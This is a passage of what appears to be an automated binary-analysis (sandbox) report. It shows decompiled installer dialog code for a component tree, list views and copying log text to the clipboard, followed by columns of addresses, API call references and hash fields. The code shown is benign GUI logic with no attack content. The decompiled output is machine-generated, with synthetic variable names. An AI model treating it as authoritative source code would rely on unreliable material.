													SendMessageA(_v8, 0x110d, _t315,  &_v72);
												}
												_v16 = _v16 + 1;
												_t281 =  &(_t281[0x106]);
												__eflags = _v16 -  *0x423ecc; // 0x3
											} while (__eflags < 0);
											goto L84;
										}
									} else {
										_t282 = E004012E2( *0x420494);
										E00401299(_t282);
										_t217 = 0;
										_t289 = 0;
										__eflags = _t282 - _t315;
										if(_t282 <= _t315) {
											L72:
											SendMessageA(_v12, 0x14e, _t289, _t315);
											_a16 = _t282;
											_a8 = 0x420;
											goto L73;
										} else {
											goto L69;
										}
										do {
											L69:
											_t309 = _v20;
											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
												_t289 = _t289 + 1;
												__eflags = _t289;
											}
											_t217 = _t217 + 1;
											__eflags = _t217 - _t282;
										} while (_t217 < _t282);
										goto L72;
									}
								}
							}
							__eflags = _a12 - 0x3f9;
							if(_a12 != 0x3f9) {
								goto L89;
							}
							__eflags = _a12 >> 0x10 - 1;
							if(_a12 >> 0x10 != 1) {
								goto L89;
							}
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							__eflags = _t227 - 0xffffffff;
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							__eflags = _t283 - 0xffffffff;
							if(_t283 == 0xffffffff) {
								L54:
								_t283 = 0x20;
								L55:
								E00401299(_t283);
								SendMessageA(_a4, 0x420, _t315, _t283);
								_a12 = 1;
								_a16 = _t315;
								_a8 = 0x40f;
								goto L56;
							}
							_t231 = _v20;
							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
								goto L55;
							}
							goto L54;
						}
						goto L28;
					}
				} else {
					 *0x423f00 = _a4;
					_t247 =  *0x423ecc; // 0x3
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x420494 = GlobalAlloc(0x40, _t247 << 2);
					_t250 = LoadBitmapA( *0x423ea0, 0x6e);
					 *0x420488 =  *0x420488 | 0xffffffff;
					_v24 = _t250;
					 *0x420490 = SetWindowLongA(_v8, 0xfffffffc, E00404E54);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42047c = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x42047c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405B88(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403F18(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403F18(_a4);
					_t318 = 0;
					_t288 = 0;
					_t328 =  *0x423ecc - _t318; // 0x3
					if(_t328 <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									__eflags = _t269 & 0x00000004;
									if((_t269 & 0x00000004) == 0) {
										 *( *0x420494 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x420494 + _t318 * 4) = _t274;
									_t288 =  *( *0x420494 + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_t331 = _t318 -  *0x423ecc; // 0x3
							_v24 = _t311;
						} while (_t331 < 0);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403F4D(_v8);
								_t280 = _v32;
								_t315 = 0;
								__eflags = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403F4D(_v12);
								L89:
								return E00403F7F(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}






































































                                                                                                                              0x00404871
                                                                                                                              0x00404877
                                                                                                                              0x00404879
                                                                                                                              0x0040487f
                                                                                                                              0x00404885
                                                                                                                              0x00404888
                                                                                                                              0x00404892
                                                                                                                              0x0040489b
                                                                                                                              0x0040489e
                                                                                                                              0x004048a1
                                                                                                                              0x00404ac9
                                                                                                                              0x00404ac9
                                                                                                                              0x00404ad0
                                                                                                                              0x00404ae4
                                                                                                                              0x00404ad2
                                                                                                                              0x00404ad4
                                                                                                                              0x00404ad7
                                                                                                                              0x00404ad8
                                                                                                                              0x00404adf
                                                                                                                              0x00404adf
                                                                                                                              0x00404ae7
                                                                                                                              0x00404af0
                                                                                                                              0x00404afb
                                                                                                                              0x00404afb
                                                                                                                              0x00404afe
                                                                                                                              0x00404b01
                                                                                                                              0x00404b10
                                                                                                                              0x00404b10
                                                                                                                              0x00404b17
                                                                                                                              0x00404b8f
                                                                                                                              0x00404b8f
                                                                                                                              0x00404b92
                                                                                                                              0x00404b94
                                                                                                                              0x00404b97
                                                                                                                              0x00404b9e
                                                                                                                              0x00404bac
                                                                                                                              0x00404bac
                                                                                                                              0x00404bae
                                                                                                                              0x00404bb1
                                                                                                                              0x00404bb8
                                                                                                                              0x00404bba
                                                                                                                              0x00404bbe
                                                                                                                              0x00404bdb
                                                                                                                              0x00404bdf
                                                                                                                              0x00404bdf
                                                                                                                              0x00404bc0
                                                                                                                              0x00404bcd
                                                                                                                              0x00404bcd
                                                                                                                              0x00404bbe
                                                                                                                              0x00404bb8
                                                                                                                              0x00000000
                                                                                                                              0x00404b92
                                                                                                                              0x00404b19
                                                                                                                              0x00404b1c
                                                                                                                              0x00404b27
                                                                                                                              0x00404b29
                                                                                                                              0x00404b2c
                                                                                                                              0x00404b33
                                                                                                                              0x00404b38
                                                                                                                              0x00404b3a
                                                                                                                              0x00404b44
                                                                                                                              0x00404b44
                                                                                                                              0x00404b48
                                                                                                                              0x00404b4a
                                                                                                                              0x00404b4d
                                                                                                                              0x00404b4f
                                                                                                                              0x00404b52
                                                                                                                              0x00404b68
                                                                                                                              0x00404b68
                                                                                                                              0x00404b54
                                                                                                                              0x00404b54
                                                                                                                              0x00404b5a
                                                                                                                              0x00404b5c
                                                                                                                              0x00404b63
                                                                                                                              0x00404b5e
                                                                                                                              0x00404b5e
                                                                                                                              0x00404b5e
                                                                                                                              0x00404b5c
                                                                                                                              0x00404b6c
                                                                                                                              0x00404b6e
                                                                                                                              0x00404b73
                                                                                                                              0x00404b7c
                                                                                                                              0x00404b7d
                                                                                                                              0x00404b87
                                                                                                                              0x00404b87
                                                                                                                              0x00404b89
                                                                                                                              0x00404b8c
                                                                                                                              0x00404b8c
                                                                                                                              0x00404b4d
                                                                                                                              0x00000000
                                                                                                                              0x00404b3a
                                                                                                                              0x00404b1e
                                                                                                                              0x00404b21
                                                                                                                              0x00404b25
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00404b25
                                                                                                                              0x00404b03
                                                                                                                              0x00404b0a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00404af2
                                                                                                                              0x00404af2
                                                                                                                              0x00404af5
                                                                                                                              0x00404be2
                                                                                                                              0x00404be2
                                                                                                                              0x00404be9
                                                                                                                              0x00404c5d
                                                                                                                              0x00404c5d
                                                                                                                              0x00404c64
                                                                                                                              0x00404c70
                                                                                                                              0x00404c70
                                                                                                                              0x00404c72
                                                                                                                              0x00404c79
                                                                                                                              0x00404c7b
                                                                                                                              0x00404c80
                                                                                                                              0x00404c82
                                                                                                                              0x00404c85
                                                                                                                              0x00404c85
                                                                                                                              0x00404c8b
                                                                                                                              0x00404c90
                                                                                                                              0x00404c92
                                                                                                                              0x00404c95
                                                                                                                              0x00404c95
                                                                                                                              0x00404c9b
                                                                                                                              0x00404ca1
                                                                                                                              0x00404ca7
                                                                                                                              0x00404ca7
                                                                                                                              0x00404cad
                                                                                                                              0x00404cb4
                                                                                                                              0x00404e01
                                                                                                                              0x00404e01
                                                                                                                              0x00404e08
                                                                                                                              0x00404e0a
                                                                                                                              0x00404e11
                                                                                                                              0x00404e15
                                                                                                                              0x00404e22
                                                                                                                              0x00404e22
                                                                                                                              0x00404e25
                                                                                                                              0x00404e2b
                                                                                                                              0x00404e3d
                                                                                                                              0x00404e3d
                                                                                                                              0x00404e11
                                                                                                                              0x00000000
                                                                                                                              0x00404cba
                                                                                                                              0x00404cbc
                                                                                                                              0x00404cc1
                                                                                                                              0x00404cc4
                                                                                                                              0x00404cc8
                                                                                                                              0x00404cc8
                                                                                                                              0x00404ccd
                                                                                                                              0x00404cd0
                                                                                                                              0x00404d11
                                                                                                                              0x00404d13
                                                                                                                              0x00404d1d
                                                                                                                              0x00404d23
                                                                                                                              0x00404d26
                                                                                                                              0x00404d2b
                                                                                                                              0x00404d32
                                                                                                                              0x00404d35
                                                                                                                              0x00404dd7
                                                                                                                              0x00404ddd
                                                                                                                              0x00404de3
                                                                                                                              0x00404de8
                                                                                                                              0x00404deb
                                                                                                                              0x00404dfc
                                                                                                                              0x00404dfc
                                                                                                                              0x00000000
                                                                                                                              0x00404d3b
                                                                                                                              0x00404d3b
                                                                                                                              0x00404d3b
                                                                                                                              0x00404d3e
                                                                                                                              0x00404d44
                                                                                                                              0x00404d47
                                                                                                                              0x00404d49
                                                                                                                              0x00404d4b
                                                                                                                              0x00404d4d
                                                                                                                              0x00404d50
                                                                                                                              0x00404d53
                                                                                                                              0x00404d5a
                                                                                                                              0x00404d5c
                                                                                                                              0x00404d5f
                                                                                                                              0x00404d66
                                                                                                                              0x00404d69
                                                                                                                              0x00404d69
                                                                                                                              0x00404d69
                                                                                                                              0x00404d69
                                                                                                                              0x00404d6d
                                                                                                                              0x00404d70
                                                                                                                              0x00404d7c
                                                                                                                              0x00404d7d
                                                                                                                              0x00404d80
                                                                                                                              0x00404d82
                                                                                                                              0x00404d82
                                                                                                                              0x00404d82
                                                                                                                              0x00404d72
                                                                                                                              0x00404d74
                                                                                                                              0x00404d74
                                                                                                                              0x00404da1
                                                                                                                              0x00404da1
                                                                                                                              0x00404da2
                                                                                                                              0x00404dae
                                                                                                                              0x00404dbd
                                                                                                                              0x00404dbd
                                                                                                                              0x00404dbf
                                                                                                                              0x00404dc2
                                                                                                                              0x00404dcb
                                                                                                                              0x00404dcb
                                                                                                                              0x00000000
                                                                                                                              0x00404d3e
                                                                                                                              0x00404cd2
                                                                                                                              0x00404cdd
                                                                                                                              0x00404ce0
                                                                                                                              0x00404ce5
                                                                                                                              0x00404ce7
                                                                                                                              0x00404ce9
                                                                                                                              0x00404ceb
                                                                                                                              0x00404cfb
                                                                                                                              0x00404d05
                                                                                                                              0x00404d07
                                                                                                                              0x00404d0a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00404ced
                                                                                                                              0x00404ced
                                                                                                                              0x00404ced
                                                                                                                              0x00404cf0
                                                                                                                              0x00404cf3
                                                                                                                              0x00404cf5
                                                                                                                              0x00404cf5
                                                                                                                              0x00404cf5
                                                                                                                              0x00404cf6
                                                                                                                              0x00404cf7
                                                                                                                              0x00404cf7
                                                                                                                              0x00000000
                                                                                                                              0x00404ced
                                                                                                                              0x00404cd0
                                                                                                                              0x00404cb4
                                                                                                                              0x00404beb
                                                                                                                              0x00404bf1
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00404bfd
                                                                                                                              0x00404c01
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00404c11
                                                                                                                              0x00404c13
                                                                                                                              0x00404c16
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00404c28
                                                                                                                              0x00404c2a
                                                                                                                              0x00404c2d
                                                                                                                              0x00404c37
                                                                                                                              0x00404c39
                                                                                                                              0x00404c3a
                                                                                                                              0x00404c3b
                                                                                                                              0x00404c4a
                                                                                                                              0x00404c4c
                                                                                                                              0x00404c53
                                                                                                                              0x00404c56
                                                                                                                              0x00000000
                                                                                                                              0x00404c56
                                                                                                                              0x00404c2f
                                                                                                                              0x00404c32
                                                                                                                              0x00404c35
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00404c35
                                                                                                                              0x00000000
                                                                                                                              0x00404af5
                                                                                                                              0x004048a7
                                                                                                                              0x004048ac
                                                                                                                              0x004048b1
                                                                                                                              0x004048b6
                                                                                                                              0x004048b7
                                                                                                                              0x004048c0
                                                                                                                              0x004048cb
                                                                                                                              0x004048d6
                                                                                                                              0x004048dc
                                                                                                                              0x004048ea
                                                                                                                              0x004048ff
                                                                                                                              0x00404904
                                                                                                                              0x0040490f
                                                                                                                              0x00404918
                                                                                                                              0x0040492d
                                                                                                                              0x0040493e
                                                                                                                              0x0040494b
                                                                                                                              0x0040494b
                                                                                                                              0x00404950
                                                                                                                              0x00404956
                                                                                                                              0x00404958
                                                                                                                              0x0040495b
                                                                                                                              0x00404960
                                                                                                                              0x00404965
                                                                                                                              0x00404967
                                                                                                                              0x00404967
                                                                                                                              0x00404987
                                                                                                                              0x00404987
                                                                                                                              0x00404989
                                                                                                                              0x0040498a
                                                                                                                              0x0040498f
                                                                                                                              0x00404992
                                                                                                                              0x00404995
                                                                                                                              0x00404999
                                                                                                                              0x0040499e
                                                                                                                              0x004049a3
                                                                                                                              0x004049a7
                                                                                                                              0x004049ac
                                                                                                                              0x004049b1
                                                                                                                              0x004049b3
                                                                                                                              0x004049b5
                                                                                                                              0x004049bb
                                                                                                                              0x00404a85
                                                                                                                              0x00404a98
                                                                                                                              0x00000000
                                                                                                                              0x004049c1
                                                                                                                              0x004049c4
                                                                                                                              0x004049c7
                                                                                                                              0x004049ca
                                                                                                                              0x004049ca
                                                                                                                              0x004049d0
                                                                                                                              0x004049d6
                                                                                                                              0x004049d9
                                                                                                                              0x004049df
                                                                                                                              0x004049e0
                                                                                                                              0x004049e5
                                                                                                                              0x004049ee
                                                                                                                              0x004049f5
                                                                                                                              0x004049f8
                                                                                                                              0x004049fb
                                                                                                                              0x004049fe
                                                                                                                              0x00404a38
                                                                                                                              0x00404a3a
                                                                                                                              0x00404a63
                                                                                                                              0x00404a3c
                                                                                                                              0x00404a49
                                                                                                                              0x00404a49
                                                                                                                              0x00404a00
                                                                                                                              0x00404a03
                                                                                                                              0x00404a12
                                                                                                                              0x00404a1c
                                                                                                                              0x00404a24
                                                                                                                              0x00404a2b
                                                                                                                              0x00404a33
                                                                                                                              0x00404a33
                                                                                                                              0x004049fe
                                                                                                                              0x00404a69
                                                                                                                              0x00404a6a
                                                                                                                              0x00404a70
                                                                                                                              0x00404a76
                                                                                                                              0x00404a76
                                                                                                                              0x00404a83
                                                                                                                              0x00404a9e
                                                                                                                              0x00404aa2
                                                                                                                              0x00404abf
                                                                                                                              0x00404ac4
                                                                                                                              0x00404ac7
                                                                                                                              0x00404ac7
                                                                                                                              0x00000000
                                                                                                                              0x00404aa4
                                                                                                                              0x00404aa9
                                                                                                                              0x00404ab2
                                                                                                                              0x00404e3f
                                                                                                                              0x00404e51
                                                                                                                              0x00404e51
                                                                                                                              0x00404aa2
                                                                                                                              0x00000000
                                                                                                                              0x00404a83
                                                                                                                              0x004049bb

                                                                                                                              APIs
                                                                                                                              • GetDlgItem.USER32 ref: 0040486A
                                                                                                                              • GetDlgItem.USER32 ref: 00404877
                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000003), ref: 004048C3
                                                                                                                              • LoadBitmapA.USER32 ref: 004048D6
                                                                                                                              • SetWindowLongA.USER32 ref: 004048F0
                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404904
                                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404918
                                                                                                                              • SendMessageA.USER32(?,00001109,00000002), ref: 0040492D
                                                                                                                              • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404939
                                                                                                                              • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 0040494B
                                                                                                                              • DeleteObject.GDI32(?), ref: 00404950
                                                                                                                              • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040497B
                                                                                                                              • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404987
                                                                                                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A1C
                                                                                                                              • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404A47
                                                                                                                              • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A5B
                                                                                                                              • GetWindowLongA.USER32 ref: 00404A8A
                                                                                                                              • SetWindowLongA.USER32 ref: 00404A98
                                                                                                                              • ShowWindow.USER32(?,00000005), ref: 00404AA9
                                                                                                                              • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404BAC
                                                                                                                              • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C11
                                                                                                                              • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C26
                                                                                                                              • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404C4A
                                                                                                                              • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C70
                                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 00404C85
                                                                                                                              • GlobalFree.KERNEL32 ref: 00404C95
                                                                                                                              • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D05
                                                                                                                              • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404DAE
                                                                                                                              • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404DBD
                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00404DDD
                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00404E2B
                                                                                                                              • GetDlgItem.USER32 ref: 00404E36
                                                                                                                              • ShowWindow.USER32(00000000), ref: 00404E3D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                              • String ID: $M$N$|U
                                                                                                                              • API String ID: 1638840714-1192479850
                                                                                                                              • Opcode ID: dede86c728acf6a11cc3ab5fbc78af527f28fbd96654b5baab0c469e43695f01
                                                                                                                              • Instruction ID: 91af9d563adbb526dddc39620d8b288a2aea1bcbb5731436b9e02a5cfbe7d22d
                                                                                                                              • Opcode Fuzzy Hash: dede86c728acf6a11cc3ab5fbc78af527f28fbd96654b5baab0c469e43695f01
                                                                                                                              • Instruction Fuzzy Hash: AB029FB0E00209AFDB21DF54DD45AAE7BB5FB84315F10817AF610BA2E1C7799A42CF58
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00405042, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 96%
                                                                                                                              			E00405042(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				unsigned int _t93;
				int _t94;
				int _t95;
				long _t98;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423684; // 0x0
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404FD6, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							__eflags = _a12 - _t154;
							if(_a12 != _t154) {
								goto L20;
							}
							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
							__eflags = _t87 - _t149;
							_a8 = _t87;
							if(_t87 <= _t149) {
								L37:
								return 0;
							}
							_t160 = CreatePopupMenu();
							AppendMenuA(_t160, _t149, 1, E00405B88(_t149, _t154, _t160, _t149, 0xffffffe1));
							_t92 = _a16;
							__eflags = _t92 - 0xffffffff;
							if(_t92 != 0xffffffff) {
								_t150 = _t92;
								_t93 = _t92 >> 0x10;
								__eflags = _t93;
								_t94 = _t93;
							} else {
								GetWindowRect(_t154,  &_v28);
								_t150 = _v28.left;
								_t94 = _v28.top;
							}
							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
							_t162 = 1;
							__eflags = _t95 - 1;
							if(_t95 == 1) {
								_v60 = _t149;
								_v48 = 0x4204a0;
								_v44 = 0xfff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
									__eflags = _a4 - _t149;
									_t162 = _t162 + _t98 + 2;
								} while (_a4 != _t149);
								OpenClipboard(_t149);
								EmptyClipboard();
								_t101 = GlobalAlloc(0x42, _t162);
								_a4 = _t101;
								_t163 = GlobalLock(_t101);
								do {
									_v48 = _t163;
									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
									 *_t164 = 0xa0d;
									_t163 = _t164 + 2;
									_t149 = _t149 + 1;
									__eflags = _t149 - _a8;
								} while (_t149 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L37;
						}
						__eflags =  *0x42366c - _t149; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x423ea8, 8);
							__eflags =  *0x423f2c - _t149; // 0x0
							if(__eflags == 0) {
								E00404F04( *((intOrPtr*)( *0x41fc70 + 0x34)), _t149);
							}
							E00403EF1(1);
							goto L25;
						}
						 *0x41f868 = 2;
						E00403EF1(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00403F7F(_a8, _a12, _a16);
						}
						ShowWindow( *0x423670, _t149);
						ShowWindow(_t154, 8);
						E00403F4D(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423eb0; // 0x55edd0
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x423670 = GetDlgItem(_a4, 0x403);
				 *0x423668 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423684 = _t127;
				_v8 = _t127;
				E00403F4D( *0x423670);
				 *0x423674 = E004047A6(4);
				 *0x42368c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403F18(_a4);
				if(( *0x423eb8 & 0x00000003) != 0) {
					ShowWindow( *0x423670, _t149);
					if(( *0x423eb8 & 0x00000002) != 0) {
						 *0x423670 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403F4D( *0x423668);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423eb8 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}


































                                                                                                                              0x0040504b
                                                                                                                              0x00405051
                                                                                                                              0x0040505a
                                                                                                                              0x0040505d
                                                                                                                              0x004051ee
                                                                                                                              0x004051f5
                                                                                                                              0x00405219
                                                                                                                              0x00405219
                                                                                                                              0x0040521f
                                                                                                                              0x0040522c
                                                                                                                              0x0040524a
                                                                                                                              0x0040524a
                                                                                                                              0x00405251
                                                                                                                              0x004052a8
                                                                                                                              0x004052a8
                                                                                                                              0x004052ac
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004052ae
                                                                                                                              0x004052b1
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004052bb
                                                                                                                              0x004052c1
                                                                                                                              0x004052c3
                                                                                                                              0x004052c6
                                                                                                                              0x004053bf
                                                                                                                              0x00000000
                                                                                                                              0x004053bf
                                                                                                                              0x004052d5
                                                                                                                              0x004052e1
                                                                                                                              0x004052e7
                                                                                                                              0x004052ea
                                                                                                                              0x004052ed
                                                                                                                              0x00405302
                                                                                                                              0x00405305
                                                                                                                              0x00405305
                                                                                                                              0x00405308
                                                                                                                              0x004052ef
                                                                                                                              0x004052f4
                                                                                                                              0x004052fa
                                                                                                                              0x004052fd
                                                                                                                              0x004052fd
                                                                                                                              0x00405318
                                                                                                                              0x00405320
                                                                                                                              0x00405321
                                                                                                                              0x00405323
                                                                                                                              0x0040532c
                                                                                                                              0x0040532f
                                                                                                                              0x00405336
                                                                                                                              0x0040533d
                                                                                                                              0x00405345
                                                                                                                              0x00405345
                                                                                                                              0x00405353
                                                                                                                              0x00405359
                                                                                                                              0x0040535c
                                                                                                                              0x0040535c
                                                                                                                              0x00405363
                                                                                                                              0x00405369
                                                                                                                              0x00405372
                                                                                                                              0x00405379
                                                                                                                              0x00405382
                                                                                                                              0x00405384
                                                                                                                              0x00405387
                                                                                                                              0x00405396
                                                                                                                              0x00405398
                                                                                                                              0x0040539e
                                                                                                                              0x0040539f
                                                                                                                              0x004053a0
                                                                                                                              0x004053a0
                                                                                                                              0x004053a8
                                                                                                                              0x004053b3
                                                                                                                              0x004053b9
                                                                                                                              0x004053b9
                                                                                                                              0x00000000
                                                                                                                              0x00405323
                                                                                                                              0x00405253
                                                                                                                              0x00405259
                                                                                                                              0x00405289
                                                                                                                              0x0040528b
                                                                                                                              0x00405291
                                                                                                                              0x0040529c
                                                                                                                              0x0040529c
                                                                                                                              0x004052a3
                                                                                                                              0x00000000
                                                                                                                              0x004052a3
                                                                                                                              0x0040525d
                                                                                                                              0x00405267
                                                                                                                              0x00000000
                                                                                                                              0x0040522e
                                                                                                                              0x0040522e
                                                                                                                              0x00405234
                                                                                                                              0x0040526c
                                                                                                                              0x00000000
                                                                                                                              0x00405275
                                                                                                                              0x0040523d
                                                                                                                              0x00405242
                                                                                                                              0x00405245
                                                                                                                              0x00000000
                                                                                                                              0x00405245
                                                                                                                              0x0040522c
                                                                                                                              0x00405063
                                                                                                                              0x00405067
                                                                                                                              0x00405070
                                                                                                                              0x00405077
                                                                                                                              0x0040507a
                                                                                                                              0x0040507d
                                                                                                                              0x00405080
                                                                                                                              0x00405081
                                                                                                                              0x00405082
                                                                                                                              0x0040509b
                                                                                                                              0x0040509e
                                                                                                                              0x004050a8
                                                                                                                              0x004050b7
                                                                                                                              0x004050bf
                                                                                                                              0x004050c7
